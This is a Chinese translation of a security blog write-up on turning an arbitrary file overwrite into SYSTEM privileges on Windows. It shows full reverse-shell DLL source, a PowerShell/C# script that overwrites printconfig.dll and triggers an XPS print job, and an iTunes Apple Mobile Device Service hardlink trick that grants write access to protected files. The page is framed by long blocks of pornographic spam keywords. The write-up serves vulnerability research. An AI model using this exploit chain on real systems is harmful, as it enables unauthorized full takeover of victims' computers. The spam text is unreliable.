精品欧美一区二区三区在线观看 _久久久久国色av免费观看性色_国产精品久久在线观看_亚洲第一综合网站_91精品又粗又猛又爽_小泽玛利亚一区二区免费_91亚洲精品国偷拍自产在线观看 _久久精品视频在线播放_美女精品久久久_欧美日韩国产成人在线

通過(guò)任意文件覆蓋漏洞直接獲取系統(tǒng)操作的最高權(quán)限

安全 漏洞
任意文件覆蓋一直被視為關(guān)鍵漏洞,因?yàn)樗赡軐?dǎo)致權(quán)限升級(jí)。

任意文件覆蓋一直被視為關(guān)鍵漏洞,因?yàn)樗赡軐?dǎo)致權(quán)限升級(jí)。在Windows系統(tǒng)中,這通常意味著模擬管理員或系統(tǒng)運(yùn)行。

[[345613]]

如果標(biāo)準(zhǔn)用戶(hù)能夠通過(guò)某種“利用”來(lái)更改特殊受保護(hù)文件的權(quán)限(通過(guò)授予他修改甚至更好的完全控制權(quán)限),則他可以更改目標(biāo)文件的內(nèi)容,以便將惡意代碼注入到服務(wù)可執(zhí)行文件、腳本、dll等。

但是隨著時(shí)間的推移,“利用后”攻擊面受到限制,例如,系統(tǒng)文件受特殊的“受信任的安裝程序”組保護(hù),甚至系統(tǒng)/管理員也只能對(duì)其進(jìn)行讀取和執(zhí)行訪(fǎng)問(wèn)。

不過(guò)最近,攻擊者通過(guò)成功更改System32中“license.rtf”文件的權(quán)限之后,可能使用Forshaw的“ Diaghub Collector利用”,因?yàn)樵撐募皇苁苄湃蔚陌惭b程序的保護(hù)。

第三方軟件始終是一個(gè)選項(xiàng),因?yàn)橥ǔK鼈儾皇?ldquo;受信任的安裝程序”的保護(hù)。攻擊者應(yīng)枚舉所有已安裝的軟件和可執(zhí)行文件,識(shí)別哪些運(yùn)行在高語(yǔ)境(high context)中,以及如何配置它們。一個(gè)典型的例子是服務(wù)可執(zhí)行文件,它以SYSTEM身份運(yùn)行,并且可由標(biāo)準(zhǔn)用戶(hù)啟動(dòng)。在我的惠普筆記本電腦上,我擁有滿(mǎn)足所有要求的“惠普軟件框架服務(wù)(HP Software Framework)”,HP Software Framework提供了一套通用的軟件接口,可以集中并簡(jiǎn)化對(duì)硬件、BIOS 和 HP 設(shè)備驅(qū)動(dòng)程序的訪(fǎng)問(wèn)。

另一個(gè)不錯(cuò)的選擇是“ Dropbox Updater Service”,它以每小時(shí)一次的系統(tǒng)權(quán)限(在標(biāo)準(zhǔn)安裝中)作為預(yù)定任務(wù)運(yùn)行。

但是如果攻擊者只想依靠標(biāo)準(zhǔn)的Windows操作系統(tǒng)軟件呢?它變得越來(lái)越困難與微軟補(bǔ)丁,但顯然有一些可能性。例如,還記得“ALPC任務(wù)調(diào)度程序”漏洞嗎?

最終結(jié)果是覆蓋“ Printconfig.dll”,其中SYSTEM擁有完全控制權(quán),啟動(dòng)XPS打印作業(yè)(將加載修改后的Printconfig.dll),并在SYSTEM用戶(hù)上下文中執(zhí)行代碼。結(jié)果,它仍然可以使用。

接下來(lái),我將向你展示如何使用相對(duì)簡(jiǎn)單的多合一Powershell腳本從printconfig.dll中“濫用”。

“Microsoft XPS Document Writer”是一種特殊的打印機(jī)驅(qū)動(dòng)程序:“Microsoft XPS文檔編寫(xiě)器(MXDW)是一種打印到文件的驅(qū)動(dòng)程序,該驅(qū)動(dòng)程序使Windows應(yīng)用程序可以從帶有Service Pack 2(SP2)的Windows XP開(kāi)始的Windows版本上創(chuàng)建XML Paper Specification(XPS)文檔文件。”

這個(gè)驅(qū)動(dòng)程序位于不同的位置(在本例中為Win 2019服務(wù)器):

有趣的是第一個(gè)文件,因?yàn)樗亲钚碌奈募⑶遗c我們的體系結(jié)構(gòu)(X64)相匹配。

因此,如果我們能夠完全控制此文件,則可以使用修改后的dll覆蓋該文件,啟動(dòng)XPS打印作業(yè),該作業(yè)將加載dll并以SYSTEM用戶(hù)身份執(zhí)行代碼(例如,反向shell)。

出于保密原因,我不會(huì)告訴你構(gòu)建和編譯DLL,而是向你展示代碼的相關(guān)部分:

  1. #include "stdafx.h" 
  2. #include   
  3. #include #define _WINSOCK_DEPRECATED_NO_WARNINGS 
  4.   
  5. using namespace std; 
  6.   
  7. void Reverse() 
  8. WSADATA wsaData; 
  9. SOCKET s1; 
  10. struct sockaddr_in hax; 
  11.   
  12. STARTUPINFO sui; 
  13. PROCESS_INFORMATION pi; 
  14. launched = TRUE
  15. WSAStartup(MAKEWORD(2, 2), &wsaData); 
  16. s1 = WSASocket(AF_INET, SOCK_STREAM, IPPROTO_TCP, NULL
  17. (unsigned int)NULL, (unsigned int)NULL); 
  18.   
  19. hax.sin_family = AF_INET; 
  20. hax.sin_port = htons(4444); 
  21. hax.sin_addr.s_addr = inet_addr("127.0.0.1"); 
  22.   
  23. WSAConnect(s1, (SOCKADDR*)&hax, sizeof(hax), NULLNULLNULLNULL); 
  24.   
  25. memset(&sui, 0, sizeof(sui)); 
  26. sui.cb = sizeof(sui); 
  27. sui.dwFlags = (STARTF_USESTDHANDLES | STARTF_USESHOWWINDOW); 
  28. sui.hStdInput = sui.hStdOutput = sui.hStdError = (HANDLE)s1; 
  29.   
  30. TCHAR commandLine[256] = L"cmd.exe"
  31. CreateProcess(NULL, commandLine, NULLNULLTRUE
  32.     0, NULLNULL, &sui, &pi); 
  33. extern "C" __declspec (dllexport) bool __cdecl DllMain(_In_ HINSTANCE hinstDLL, 
  34.     _In_ DWORD     fdwReason, 
  35.     _In_ LPVOID    lpvReserved 
  36.                      ) 
  37.   
  38.      
  39.     switch (fdwReason) 
  40.     { 
  41.     case DLL_PROCESS_ATTACH: 
  42.          
  43.         Reverse(); 
  44.          
  45.         break; 
  46.     case DLL_THREAD_ATTACH: 
  47.     case DLL_THREAD_DETACH: 
  48.     case DLL_PROCESS_DETACH: 
  49.         break; 
  50.     } 
  51.      
  52.      
  53.      
  54.        
  55.     return TRUE

加載庫(kù)時(shí)總是調(diào)用DLLMain(),它將在本地主機(jī)端口4444上執(zhí)行我們的反向shell。

我們只需要編譯DLL并將其轉(zhuǎn)換為b64中的二進(jìn)制文件,因?yàn)槲覀儠?huì)將其插入到ps1腳本中:

  1. $FilePath="c:\temp\my.dll" 
  2. $ByteArray = [System.IO.File]::ReadAllBytes($FilePath) 
  3. $Base64String = [System.Convert]::ToBase64String($ByteArray) 
  4. $Base64String | Set-Content -force "out.64" 

現(xiàn)在我們的腳本是“xps.ps1”,必須包含一些c#代碼,因?yàn)樗菀渍{(diào)用和操作API函數(shù):

  1. $mycode = @" 
  2. using System; 
  3. using System.ComponentModel; 
  4. using System.IO; 
  5. using System.Runtime.InteropServices; 
  6. namespace XPS 
  7. public class XpsPrint 
  8. public static void StartPrintJob() 
  9. PrintJob("Microsoft XPS Document Writer""myjob"); 
  10. public static void PrintJob(string printerName, string jobName) 
  11. IntPtr completionEvent = CreateEvent(IntPtr.Zero, truefalsenull); 
  12. if (completionEvent == IntPtr.Zero) 
  13. throw new Win32Exception(); 
  14. try 
  15. IXpsPrintJob job; 
  16. IXpsPrintJobStream jobStream; 
  17. StartJob(printerName, jobName, completionEvent, out job, out jobStream); 
  18. jobStream.Close(); 
  19.   
  20.   
  21. finally 
  22. if (completionEvent != IntPtr.Zero) 
  23. CloseHandle(completionEvent); 
  24. private static void StartJob(string printerName, string jobName, IntPtr completionEvent, out IXpsPrintJob job, out IXpsPrintJobStream jobStream) 
  25. int result = StartXpsPrintJob(printerName, jobName, null, IntPtr.Zero, completionEvent, 
  26. null, 0, out job, out jobStream, IntPtr.Zero); 
  27.   
  28. [DllImport("XpsPrint.dll", EntryPoint = "StartXpsPrintJob")] 
  29. private static extern int StartXpsPrintJob( 
  30. [MarshalAs(UnmanagedType.LPWStr)] String printerName, 
  31. [MarshalAs(UnmanagedType.LPWStr)] String jobName, 
  32. [MarshalAs(UnmanagedType.LPWStr)] String outputFileName, 
  33. IntPtr progressEvent,  
  34. IntPtr completionEvent,  
  35. [MarshalAs(UnmanagedType.LPArray)] byte[] printablePagesOn, 
  36. UInt32 printablePagesOnCount, 
  37. out IXpsPrintJob xpsPrintJob, 
  38. out IXpsPrintJobStream documentStream, 
  39. IntPtr printTicketStream);  
  40. [DllImport("Kernel32.dll", SetLastError = true)] 
  41. private static extern IntPtr CreateEvent(IntPtr lpEventAttributes, bool bManualReset, bool bInitialState, string lpName); 
  42. [DllImport("Kernel32.dll", SetLastError = true, ExactSpelling = true)] 
  43. private static extern WAIT_RESULT WaitForSingleObject(IntPtr handle, Int32 milliseconds); 
  44. [DllImport("Kernel32.dll", SetLastError = true)] 
  45. [return: MarshalAs(UnmanagedType.Bool)] 
  46. private static extern bool CloseHandle(IntPtr hObject); 
  47. [Guid("0C733A30-2A1C-11CE-ADE5-00AA0044773D")]  
  48. [InterfaceType(ComInterfaceType.InterfaceIsIUnknown)] 
  49. interface IXpsPrintJobStream 
  50. void Read([MarshalAs(UnmanagedType.LPArray)] byte[] pv, uint cb, out uint pcbRead); 
  51. void Write([MarshalAs(UnmanagedType.LPArray)] byte[] pv, uint cb, out uint pcbWritten); 
  52. void Close(); 
  53. [Guid("5ab89b06-8194-425f-ab3b-d7a96e350161")] 
  54. [InterfaceType(ComInterfaceType.InterfaceIsIUnknown)] 
  55. interface IXpsPrintJob 
  56. void Cancel(); 
  57. void GetJobStatus(out XPS_JOB_STATUS jobStatus); 
  58. [StructLayout(LayoutKind.Sequential)] 
  59. struct XPS_JOB_STATUS 
  60. public UInt32 jobId; 
  61. public Int32 currentDocument; 
  62. public Int32 currentPage; 
  63. public Int32 currentPageTotal; 
  64. public XPS_JOB_COMPLETION completion; 
  65. public Int32 jobStatus;  
  66. }; 
  67. enum XPS_JOB_COMPLETION 
  68. XPS_JOB_IN_PROGRESS = 0, 
  69. XPS_JOB_COMPLETED = 1, 
  70. XPS_JOB_CANCELLED = 2, 
  71. XPS_JOB_FAILED = 3 
  72. enum WAIT_RESULT 
  73. WAIT_OBJECT_0 = 0, 
  74. WAIT_ABANDONED = 0x80, 
  75. WAIT_TIMEOUT = 0x102, 
  76. WAIT_FAILED = -1  
  77.   
  78. "@ 
  79. ## Change this according to your system: 
  80. $dllb64="..." 
  81. $targetfile="C:\Windows\System32\DriverStore\FileRepository\prnms003.inf_amd64_e4ff50d4d5f8b2aa\Amd64\printconfig.dll" 
  82. $PEBytes = [System.Convert]::FromBase64String($dllb64) 
  83. $PEBytes | Set-Content -force $targetfile -Encoding Byte 
  84. add-type -typeDefinition $mycode 
  85. [XPS.XpsPrint]::StartPrintJob() 
  86. echo "[+] done!" 
  87. exit 

在$ddlB64變量中,我們將分配之前保存在“out.64”中的dll的b64字符串。

現(xiàn)在,出于測(cè)試目的,以SYSTEM用戶(hù)身份,只需更改“ printconfig.dll”的權(quán)限。請(qǐng)記住,要進(jìn)行備份!

讓我們繼續(xù):

是的,它絕對(duì)有效!通過(guò)以沒(méi)有特殊權(quán)限的標(biāo)準(zhǔn)用戶(hù)身份啟動(dòng)XPS打印作業(yè),獲得了SYSTEM用戶(hù)的反向shell!

為了擺脫文件對(duì)話(huà)框,我們可以在StartJob()方法中指定一個(gè)文件名:

  1. private static void StartJob(string printerName, string jobName, IntPtr completionEvent, out IXpsPrintJob job, out IXpsPrintJobStream jobStream) 
  2. int result = StartXpsPrintJob(printerName, jobName, 
  3. "c:\\windows\\temp\\test.txt", IntPtr.Zero, completionEvent, 
  4. null, 0, out job, out jobStream, IntPtr.Zero); 
  5.   

但你猜怎么著?你將模擬“NT AUTHORITY\LOCAL SERVICE”!

在本例中,將調(diào)用允許后臺(tái)打印XPS文件的驅(qū)動(dòng)程序“printfilterpipelinesvc.exe”,并以“本地服務(wù)”帳戶(hù)而非“系統(tǒng)”帳戶(hù)運(yùn)行該驅(qū)動(dòng)程序!

但是攻擊者怎么才能覆蓋任意文件?

如上所述,我將通過(guò)一個(gè)真實(shí)的示例向你展示如何利用“Printconfig” dl。但是。這個(gè)iPhone有什么關(guān)系呢?

為此,我特意尋找了可以通過(guò)硬鏈接利用的特權(quán)文件操作。

通過(guò)努力,我們發(fā)現(xiàn)了目錄c:\programdata\apple\lockdown。

iTunes軟件安裝的“蘋(píng)果移動(dòng)設(shè)備服務(wù)”使用此文件夾,該服務(wù)以“本地系統(tǒng)”特權(quán)運(yùn)行,負(fù)責(zé)處理通過(guò)USB端口與蘋(píng)果設(shè)備(iPhone,iPad等)的通信。

如下所示,標(biāo)準(zhǔn)用戶(hù)可以在以下目錄中添加文件:

每次插入新設(shè)備時(shí),驅(qū)動(dòng)程序都會(huì)以

現(xiàn)在,插入我們的蘋(píng)果設(shè)備。將生成“配對(duì)證書(shū)”,并且在此文件上設(shè)置的權(quán)限如下:

如你所見(jiàn),用戶(hù)僅對(duì)此文件具有讀取權(quán)限。

現(xiàn)在你會(huì)發(fā)現(xiàn)一個(gè)有趣的事情,如果你拔下設(shè)備的插頭,然后再次插入,則會(huì)發(fā)生一些神奇的事情,從而授予用戶(hù)對(duì)該文件的完全控制權(quán)限:

我們使用Sysinternals的“procmon”工具觀(guān)察到這種有趣的行為:

SetSecurity調(diào)用是從提升的上下文(SYSTEM)發(fā)出的,它將授予用戶(hù)對(duì)資源的完全控制權(quán)。所以這個(gè)會(huì)不會(huì)成為一個(gè)漏洞,被攻擊者利用呢?

答案是肯定的,只需輸入 “NATIVE HARDLINKS“即可。

標(biāo)準(zhǔn)的Windows用戶(hù)不需要特殊的權(quán)限即可創(chuàng)建此類(lèi)鏈接,我們可以使用Forshaw的實(shí)用程序來(lái)管理它們。

那么,為什么不在此文件上設(shè)置“本機(jī)硬鏈接(“native hardlink”)”,并讓其指向只有SYSTEM才能完全控制的資源呢?

這是我們要做的,將我們的

現(xiàn)在,我們只需要插入我們的蘋(píng)果設(shè)備即可更改目標(biāo)文件的權(quán)限:

是的,它起作用了!

至此,我們已經(jīng)完成了所有的工作,只需要將目標(biāo)文件更改為printconfig.dll,然后用我們自己的dll覆蓋它,開(kāi)始XPS打印作業(yè),最后享受SYSTEM shell。你可以觀(guān)看POC的視頻,鏈接請(qǐng)點(diǎn)擊這

邊界條件

1. 你需要在Windows計(jì)算機(jī)上具有用戶(hù)shel程序訪(fǎng)問(wèn)權(quán)限;

2. iTunes和Apple Mobile Device Service應(yīng)該一起安裝,為此我們使用最新的iTunes版本(在撰寫(xiě)本文時(shí)為12.10.3)對(duì)其進(jìn)行了測(cè)試。

3. 出于測(cè)試目的,你需要對(duì)計(jì)算機(jī)進(jìn)行物理訪(fǎng)問(wèn)才能插入蘋(píng)果設(shè)備,但這并不是必須的。因?yàn)槟憧梢詣h除* .plist文件,創(chuàng)建指向目標(biāo)dll的相同* .plist文件的硬鏈接,然后等待設(shè)備插件。我們觀(guān)察到有時(shí)即使沒(méi)有配對(duì)設(shè)備也會(huì)設(shè)置完全權(quán)限,但是我們需要對(duì)其進(jìn)行更多研究。

注意

在Windows未來(lái)發(fā)布的版本在,通用硬鏈接濫用中將不再起作用。因?yàn)椋谧钚碌?ldquo;Insider”預(yù)覽中,MS添加了一些補(bǔ)充檢查,因此,如果你無(wú)權(quán)訪(fǎng)問(wèn)目標(biāo)文件,則在嘗試創(chuàng)建硬鏈接時(shí)會(huì)收到拒絕訪(fǎng)問(wèn)錯(cuò)誤。

微軟在每一個(gè)新系統(tǒng)正式發(fā)行之前,都會(huì)向開(kāi)發(fā)者提供預(yù)覽版系統(tǒng),以便更快的找到 Bug 并解決。而 Windows Insider 的開(kāi)放注冊(cè)讓更多的人加入到 Windows 10的改進(jìn)和完善的工作中來(lái),讓W(xué)indows 更加適應(yīng)消費(fèi)者的需求。

本文翻譯自:https://decoder.cloud/2019/11/13/from-arbitrary-file-overwrite-to-system/ https://decoder.cloud/2019/12/12/from-iphone-to-nt-authoritysystem/如若轉(zhuǎn)載,請(qǐng)注明原文地址。

 

責(zé)任編輯:姜華 來(lái)源: 嘶吼網(wǎng)
相關(guān)推薦

2013-10-31 13:19:06

2011-12-26 10:17:12

2009-07-06 17:34:20

PEARMail函數(shù)php

2013-08-29 15:24:36

2011-04-01 09:43:50

Windows 7權(quán)限

2021-07-22 16:09:02

漏洞WindowsLinux

2015-03-09 10:22:23

2009-07-14 14:37:11

Flex

2014-11-28 15:29:52

2011-12-13 11:08:00

2019-01-02 09:16:27

2013-09-02 09:19:19

2013-10-24 11:03:07

Windows 8.1Windows 8System權(quán)限

2025-07-10 14:44:50

漏洞終端安全網(wǎng)絡(luò)安全

2023-07-31 08:02:28

2015-03-06 15:31:01

2025-03-28 10:31:17

2010-04-16 17:49:28

Unix操作系統(tǒng)

2022-02-16 11:51:16

McAfee漏洞Windows

2013-07-11 09:51:15

點(diǎn)贊
收藏

51CTO技術(shù)棧公眾號(hào)

97久久超碰国产精品电影| 天天超碰亚洲| 在线视频国内一区二区| 三区精品视频观看| 国产高潮在线观看| 亚洲国产一区二区精品专区| 亚洲男人天天操| 91日韩精品视频| 蜜桃视频www网站在线观看| 国产日产欧美精品一区二区三区| 亚洲一区二区三区久久| 亚洲精品男人天堂| 一区二区三区午夜探花| 亚洲欧美另类在线观看| 在线免费黄色小视频| 日韩电影网站| 亚洲国产另类av| 伊人久久大香线蕉午夜av| 天天综合网在线观看| 久久99国产精品免费| 91av在线免费观看视频| 中文字幕五月天| 蜜臀91精品国产高清在线观看| 欧美酷刑日本凌虐凌虐| 国内外成人激情视频| 色影院视频在线| 91香蕉视频mp4| 亚洲最大的成人网| 中文字幕 视频一区| 亚洲国产第一| 精品精品国产国产自在线| 欧美 日本 国产| 亚洲天堂av资源在线观看| 欧美日韩精品综合在线| 99蜜桃臀久久久欧美精品网站| 中文字幕资源网在线观看| 国产欧美精品一区二区三区四区| 国产精品初高中精品久久| 中文字幕日韩国产| 老妇喷水一区二区三区| 羞羞色国产精品| 久久久精品国产sm调教网站| 亚洲电影在线一区二区三区| 在线播放精品一区二区三区 | 亚洲一区二区三区精品在线观看| 无码精品一区二区三区在线| 高清在线不卡av| 亚洲一区二区三| 国产精品综合在线| 久久电影国产免费久久电影| 国产精品久久中文| 亚洲精品久久久久久久蜜桃| 亚洲自拍另类| 欧美与欧洲交xxxx免费观看| 亚洲精品www久久久久久| 自拍视频亚洲| 欧美乱妇40p| 免费无遮挡无码永久在线观看视频 | 亚洲人成午夜免电影费观看| 亚洲国产视频直播| av日韩一区二区三区| 91高清视频在线观看| 亚洲超碰精品一区二区| 99在线精品免费视频| 精精国产xxx在线视频app| 午夜av区久久| 99福利在线观看| 日韩在线免费| 欧美日韩国产区一| 99视频在线观看视频| 麻豆精品国产| 亚洲黄一区二区| 国产交换配乱淫视频免费| 精品国产不卡| 日韩在线精品一区| 人妻久久一区二区| 日韩一区二区久久| 国产精品18久久久久久首页狼 | 精品日韩欧美一区二区| 亚洲精品国产成人av在线| 全球av集中精品导航福利| 亚洲欧美日韩在线一区| 精品一区二区在线观看视频| 亚洲电影在线一区二区三区| 午夜精品一区二区三区在线| 久久久蜜桃一区二区| 麻豆精品国产传媒mv男同| 亚洲一区二区三区四区视频| 欧美一级淫片aaaaaa| 久久精品夜色噜噜亚洲aⅴ| 一区二区免费在线视频| 成人超碰在线| 欧美中文字幕久久| xxxxwww一片| 国产精品手机在线播放| 精品国产一区二区三区在线观看| 精品97人妻无码中文永久在线| 制服诱惑一区二区| 国产日韩精品在线播放| 男人天堂综合网| 欧美国产日韩一二三区| 精品少妇人妻av一区二区| 三级在线看中文字幕完整版| 欧美久久久久久久久中文字幕| 91精产国品一二三| 欧洲杯什么时候开赛| 欧美福利在线观看| 天天综合久久综合| 成人av在线电影| 亚洲一卡二卡三卡| 国产免费拔擦拔擦8x高清在线人 | 亚洲成a人片77777精品| 国产日产欧美一区| 青草青青在线视频| 国产视频一区二| 亚洲人成自拍网站| 国产精品成人aaaa在线| 精品一区免费av| 日本午夜精品一区二区三区| 暧暧视频在线免费观看| 欧美日韩久久久| 精品无码人妻一区| 影音先锋在线一区| 亚洲一区二区久久久久久久| 成人免费黄色网页| 精品毛片三在线观看| 黄色片免费网址| 爽成人777777婷婷| 国产精品91视频| 日本在线视频1区| 亚洲电影中文字幕在线观看| а 天堂 在线| 91一区二区| 国产精品九九九| 肉丝一区二区| 精品人伦一区二区三区蜜桃免费| 久久久久久久久久久影视| 久久精品高清| 国产精品入口福利| 岛国在线大片| 色呦呦一区二区三区| 精品人妻一区二区免费视频| 国产综合激情| 粉嫩av免费一区二区三区| 中文在线手机av| 91精品国产aⅴ一区二区| a一级免费视频| 久久狠狠婷婷| 日本一区二区高清视频| 88xx成人免费观看视频库 | 欧美黑人欧美精品刺激| 一区二区三区福利| 国产在线精品一区二区三区| 69av成人| 亚洲精品美女在线| 精品人妻在线播放| 99精品1区2区| 中文字幕日本最新乱码视频| 欧美美女在线| 国产精品久久电影观看| 日韩黄色影片| 欧美性xxxx极品高清hd直播 | 中文字幕人成不卡一区| 九九热99视频| 女人香蕉久久**毛片精品| 亚洲综合视频1区| 免费污视频在线| 亚洲精品av在线| 圆产精品久久久久久久久久久| 99精品久久免费看蜜臀剧情介绍| 成年人视频在线免费| 日韩av密桃| 亚洲aa中文字幕| 福利在线导航136| 亚洲美女喷白浆| 97人妻一区二区精品视频| 中文字幕乱码一区二区免费| 肉色超薄丝袜脚交| 激情欧美亚洲| 欧美日韩国产一二| 日韩成人精品一区二区三区| 九色精品美女在线| 亚洲人成色777777精品音频| 色噜噜狠狠成人网p站| 中文字幕乱码av| 成人手机电影网| 国产成人手机视频| 日韩免费一区| 国产私拍一区| 精品成人av| 色综合久综合久久综合久鬼88| 亚欧洲精品视频| 欧美精品1区2区| 国产又色又爽又黄的| 国产精品国产三级国产普通话蜜臀 | 青青草在线观看视频| 91视频免费观看| 中文字幕22页| 夜夜嗨一区二区| 亚洲一区免费看| 久久免费视频66| 国产精品视频网站| 波多野结衣在线高清| 中文字幕亚洲无线码a| 无码精品在线观看| 欧美一区二区三区公司| 久久亚洲精品石原莉奈| 亚洲另类色综合网站| 西西444www无码大胆| 国产ts人妖一区二区| 一区二区三区 欧美| 99精品视频免费观看视频| 中国成人亚色综合网站| 国产剧情一区| 国产美女精品在线观看| 性欧美video另类hd尤物| 欧美最猛性xxxxx免费| 四季久久免费一区二区三区四区| 中文字幕精品网| 日韩一区av| 亚洲精品在线网站| 国产精品伦理一区| 在线观看国产91| 日韩三级一区二区三区| 中文字幕在线不卡一区二区三区 | 国产精品久久久久久户外露出| 艳妇乳肉亭妇荡乳av| 国产福利精品导航| 日韩av片免费观看| 美女视频黄频大全不卡视频在线播放| www黄色日本| 精久久久久久| 国产精品视频网站在线观看| 欧美电影《睫毛膏》| 日韩偷拍一区二区| 蜜桃一区二区| 欧美精品一区二区视频| 亚洲资源网你懂的| 久久av免费一区| 日韩超碰人人爽人人做人人添| 粉嫩精品一区二区三区在线观看| 不卡的国产精品| 国产精品久久久久久久久久小说| 日韩成人av电影| 热久久这里只有| 国产日韩另类视频一区| 日韩av123| 三上悠亚一区二区| 日本一本a高清免费不卡| 免费电影日韩网站| 日韩免费不卡av| 免费观看欧美大片| 国产成人在线播放| 日韩精品影片| 国产精品日韩av| 图片一区二区| 亚洲伊人久久大香线蕉av| 久久9999免费视频| 91精品国产高清久久久久久91裸体| 精品一区二区三区亚洲| www 成人av com| 加勒比视频一区| 美媛馆国产精品一区二区| 九九热线有精品视频99| 日韩三级电影免费观看| 久久中文字幕二区| 波多野结衣 作品| 激情综合网址| 不卡影院一区二区| 另类人妖一区二区av| 91pony九色| 高清在线不卡av| 老牛影视av老牛影视av| 国产精品国产精品国产专区不蜜| 99鲁鲁精品一区二区三区| 亚洲一区二区视频| 在线免费观看国产精品| 欧美精品粉嫩高潮一区二区| 黄色www视频| 亚洲人成在线免费观看| 成人免费网址| 4438全国亚洲精品在线观看视频| 色猫猫成人app| 超碰97在线人人| 日韩理论电影中文字幕| 亚洲欧美日韩在线综合 | 亚洲一卡二卡在线| 日韩欧美视频一区| 男同在线观看| 日韩在线一区二区三区免费视频| 深夜国产在线播放| 国模叶桐国产精品一区| 日本在线中文字幕一区二区三区| 91精品国产一区二区三区动漫| 亚洲欧美成人vr| 激情五月五月婷婷| 久久中文在线| 人妻av一区二区三区| 国产日韩精品一区二区三区| 一级黄色录像视频| 欧美亚洲综合久久| 人人妻人人澡人人爽久久av | 精品蜜桃一区二区三区| 欧美午夜精彩| 成人一区二区免费视频| 极品少妇xxxx精品少妇偷拍| 波多野结衣av在线免费观看| 亚洲另类春色国产| 中文字幕第三页| 亚洲福利视频二区| www久久日com| 国产精品美女呻吟| 亚洲精品一级二级三级| 国产精品igao激情视频| 毛片av一区二区三区| 成年人网站免费看| 亚洲午夜在线电影| 99在线精品视频免费观看20| 亚洲欧美在线免费观看| www.综合网.com| 444亚洲人体| 手机在线电影一区| 成人黄色一区二区| 91蜜桃网址入口| 日本网站在线免费观看| 日韩一区二区电影在线| 麻豆视频免费在线观看| 国产精品入口福利| 精品久久网站| 色综合久久中文字幕| 国产偷拍一区二区| 色偷偷av一区二区三区乱| 玛雅亚洲电影| 玛丽玛丽电影原版免费观看1977 | 国产又黄又大又粗的视频| 亚洲欧美一区二区激情| 捆绑调教日本一区二区三区| 成人女人免费毛片| 欧美日本不卡| av在线网站免费观看| 一区在线中文字幕| 亚洲在线观看av| 日韩中文字幕免费| 欧美亚洲黄色| 一区二区三区日韩视频| 精品一区二区国语对白| 波兰性xxxxx极品hd| 欧美日本一区二区在线观看| 午夜在线播放| 成人日韩av在线| 亚洲一区二区日韩| 中文字幕第66页| 一区二区三区在线播放| 亚洲国产日韩在线观看| 久久精品国亚洲| 桃花岛tv亚洲品质| 国产一区在线免费观看| 亚洲一区免费| 人妻少妇无码精品视频区| 色综合视频在线观看| 大胆av不用播放器在线播放| 国产精品欧美日韩| 婷婷久久一区| 成年人性生活视频| 午夜视频在线观看一区二区| 香蕉人妻av久久久久天天| 日本中文字幕成人| 日韩久久久久| 1314成人网| 性做久久久久久免费观看欧美| 亚洲色欧美另类| 国产激情久久久| 91精品国产91久久综合| 欧美熟妇精品一区二区| 狠狠色狠狠色综合日日五| 成人在线免费观看| 51国偷自产一区二区三区| 亚洲区国产区| 一级特黄曰皮片视频| 欧美一区二区精品在线| 久草在线资源站手机版| 日韩亚洲一区在线播放| 国产精品自在欧美一区| 国产性xxxx高清| 最近日韩中文字幕中文| 亚洲国产欧美在线观看| 黄色影院一级片| 中文字幕中文字幕一区二区| 欧美一级特黄aaaaaa大片在线观看| 国产suv精品一区二区三区88区| 99精品综合| 精品国产av色一区二区深夜久久 | 国产精品进线69影院| 亚洲精品人妻无码| 国产精品福利在线观看| 韩日欧美一区| 亚洲精品天堂网| 日韩福利视频在线观看| 99精品美女视频在线观看热舞| 亚洲 欧美 日韩 国产综合 在线|